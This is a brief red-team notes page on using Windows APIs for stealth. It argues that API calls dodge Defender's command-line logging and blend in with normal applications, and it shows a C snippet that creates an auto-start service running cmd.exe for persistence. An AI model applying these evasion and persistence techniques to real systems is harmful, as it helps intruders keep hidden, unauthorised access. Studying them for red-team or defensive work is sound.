Benefits of Using APIs
WinApis are generally better than using commands to execute code or to gather info. The Pros of using APIs are:
  1. 1.
    Bypass command line logging(Defender may look specifically at LOLBins)
  2. 2.
    Confuse our activity with regular applications
  3. 3.
    May have additional functionality or for compatibility reasons
Here are some code snippets of using APIs for persistence:

Service Creation

SC_HANDLE hManager = OpenSCManager( NULL, NULL, SC_MANAGER_ALL_ACCESS );
SC_HANDLE service = CreateService(
hManager,
"ServiceName",
"Display Name",
GENERIC_READ | GENERIC_EXECUTE,
SERVICE_WIN32_OWN_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
"C:\\Windows\\System32\\cmd.exe",
NULL, NULL, NULL, NULL, NULL
);
Copy link